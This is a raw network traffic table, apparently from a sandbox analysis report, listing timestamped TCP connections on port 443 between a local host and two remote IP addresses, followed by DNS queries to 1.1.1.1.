                                                                                                                                                Oct 28, 2024 17:49:20.641443014 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.642327070 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.642386913 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.642391920 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.692725897 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.762056112 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762068987 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762139082 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762147903 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762168884 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.762211084 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762264967 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762326002 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.762326002 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.762433052 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762490988 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.762506962 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762562037 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.762809992 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.762876987 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.763225079 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.763269901 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.763302088 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.763304949 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.763334036 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.763362885 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.763364077 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.763602018 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.806458950 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.806561947 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.883826017 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.883899927 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.883964062 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.883966923 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.883985043 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.884021997 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.884355068 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.884413958 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.884418964 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.884474993 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.884599924 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.884686947 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.884819031 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.884884119 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.884905100 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.884965897 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.885871887 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.885931969 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:20.928682089 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:20.928778887 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.005911112 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.005970955 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.006035089 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.006053925 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.006088972 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.006123066 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.006288052 CET49801443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.006325960 CET44349801104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.009555101 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.009591103 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.009691954 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.010039091 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.010056019 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.289153099 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.289272070 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.289371014 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.289767981 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.289803028 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.624686003 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.625024080 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.625039101 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.625951052 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.626338959 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.626478910 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.626504898 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.665772915 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.665779114 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.769640923 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.769705057 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.769773960 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.770788908 CET49802443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.770801067 CET44349802104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.898818970 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.899153948 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.899184942 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.900382996 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.900789976 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.900943041 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:21.900954008 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.900974989 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:21.953767061 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.045259953 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:22.045520067 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:22.045597076 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.045615911 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:22.045680046 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:22.045738935 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.046189070 CET49803443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.046209097 CET44349803104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:22.369976997 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.370029926 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:22.370120049 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.370341063 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:22.370357990 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.006560087 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.006894112 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.006917953 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.008052111 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.008358002 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.008486032 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.008492947 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.008538008 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.047779083 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.150114059 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.150273085 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.150332928 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.151087046 CET49804443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.151112080 CET44349804104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.153846025 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.153928041 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.154047966 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.154321909 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.154359102 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.436415911 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.436474085 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.436572075 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.436780930 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.436798096 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.768604040 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.768963099 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.768987894 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.770164013 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.770611048 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.770797968 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.770832062 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:23.811341047 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:23.825844049 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.070540905 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.070718050 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.070811033 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.071543932 CET49805443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.071568012 CET44349805104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.073874950 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.074146032 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.074183941 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.074671030 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.075036049 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.075125933 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.075160027 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.075252056 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.075297117 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.075404882 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.075460911 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.411945105 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412101030 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412194014 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412209034 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.412230968 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412288904 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.412303925 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412466049 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412525892 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.412532091 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412617922 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.412677050 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.412683964 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.461803913 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.461847067 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.509763956 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.527160883 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.527400017 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.527483940 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.527496099 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.527523994 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.527574062 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.527663946 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.527863026 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.527920961 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.527940989 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.528178930 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.528234959 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.528249979 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.528363943 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.528424025 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.528434992 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.528537035 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.528592110 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.528621912 CET49806443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.528644085 CET44349806104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.531743050 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.531826973 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:24.531940937 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.532195091 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:24.532223940 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.136126995 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.136498928 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:25.136567116 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.137043953 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.137348890 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:25.137449980 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.137480021 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:25.183346033 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.191883087 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:25.278268099 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.278356075 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:25.278438091 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:25.279115915 CET49807443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:25.279139996 CET44349807104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:30.498755932 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:30.498776913 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:30.498850107 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:30.499142885 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:30.499155045 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.121997118 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.122363091 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.122391939 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.123452902 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.123532057 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.123954058 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.124020100 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.124140024 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.124150991 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.169621944 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.268054008 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.268399000 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.268450022 CET4434980835.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.268507957 CET49808443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.268953085 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.268995047 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.269076109 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.269330025 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.269346952 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.894658089 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.895113945 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.895131111 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.896157026 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.896219969 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.896650076 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.896699905 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.896800041 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.939332962 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.941776991 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:31.941786051 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:31.988770008 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:49:32.044595003 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:32.046566963 CET4434980935.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:32.046617985 CET49809443192.168.2.1635.190.80.1
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 28, 2024 17:47:27.977171898 CET5334153192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:27.977431059 CET5883353192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:28.104357958 CET53556941.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:28.104501009 CET53622371.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:28.143244982 CET5982953192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:28.143435001 CET5304553192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:28.980508089 CET5422753192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:28.980703115 CET6084653192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:28.998241901 CET53542271.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:29.000827074 CET53608461.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:29.516817093 CET53601931.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:30.478187084 CET6022653192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:30.478323936 CET5719153192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:30.485804081 CET53571911.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:30.486747980 CET53602261.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.674608946 CET5455053192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:32.675030947 CET5774353192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:32.682213068 CET53545501.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.682842016 CET53577431.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.585235119 CET5437253192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:35.585387945 CET5888853192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:35.593935013 CET53543721.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.594513893 CET6031853192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:35.594666958 CET5492653192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:35.603411913 CET53603181.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.604057074 CET53549261.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.619913101 CET53588881.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.756203890 CET5861053192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:36.756366968 CET5427953192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:36.764846087 CET53542791.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.765001059 CET53586101.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.159388065 CET5634453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:37.159547091 CET5315653192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:37.166891098 CET53563441.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.168206930 CET53531561.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.850783110 CET5571053192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:46.442024946 CET53605301.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.062951088 CET6459053192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:56.063132048 CET6513453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:56.070350885 CET53645901.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:56.071152925 CET53651341.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:57.531933069 CET5089553192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:57.532078981 CET5777953192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:47:57.539678097 CET53508951.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:57.539922953 CET53577791.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:05.367907047 CET53608931.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:27.695384979 CET53588421.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:27.824501991 CET53504471.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:28.712532997 CET138138192.168.2.16192.168.2.255
                                                                                                                                                Oct 28, 2024 17:48:30.478482008 CET6401853192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:48:30.478701115 CET5392453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:48:30.485842943 CET53539241.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:30.487251997 CET53640181.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:56.475013971 CET53643461.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:11.548286915 CET5240253192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:11.548425913 CET5588553192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:11.556094885 CET53524021.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:11.556859970 CET53558851.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.738257885 CET5176153192.168.2.161.1.1.1
